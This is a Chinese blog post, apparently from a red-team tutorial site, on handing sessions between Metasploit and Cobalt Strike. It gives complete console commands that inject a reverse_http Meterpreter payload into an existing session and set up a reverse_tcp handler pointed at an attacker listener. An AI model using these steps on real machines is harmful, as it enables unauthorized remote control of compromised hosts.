metasploit与Cobaltstrike互相派生转化shell

颓废 2021年1月20日11:19:10评论168 views字数 914阅读3分2秒阅读模式
摘要

msfcsshell 一般大家都是两款神器结合使用,自然少不了shell之间转换。首先cs创建一个windows/becon_http/reverse_http的 Listener

msfcsshell

前言

一般大家都是两款神器结合使用,自然少不了shell之间转换。

msf转cs

首先cs创建一个windows/becon_http/reverse_http的 Listener

再用msf弹shell过去

   msf exploit(handler) >  use exploit/windows/local/payload_inject   msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http   msf exploit(payload_inject) > set DisablePayloadHandler true   msf exploit(payload_inject) > set LHOST 192.168.0.143   msf exploit(payload_inject) > set LPORT 4444   msf exploit(payload_inject) > set SESSION 1    (用session命令可以查看对应id)   msf exploit(payload_inject) > exploit 

cs转msf

先用msf监听

msf > use exploit/multi/handler  msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.0.143 msf exploit(handler) > set lport 4444 msf exploit(handler) > exploit 

再用cs反弹

创建一个windows/foreign/reverse_tcp的 Listener
然后选中对应机器,右键->Spawn,选择刚刚创建的监听器。

ps:注意两边用的payload要一致

来源:http://www.safe6.cn/

本文由 safe6 创作,著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

metasploit与Cobaltstrike互相派生转化shell

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!! 最后编辑时间为: 2020-07-20

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2021年1月20日11:19:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   metasploit与Cobaltstrike互相派生转化shellhttp://cn-sec.com/archives/247648.html

发表评论

匿名网友 填写信息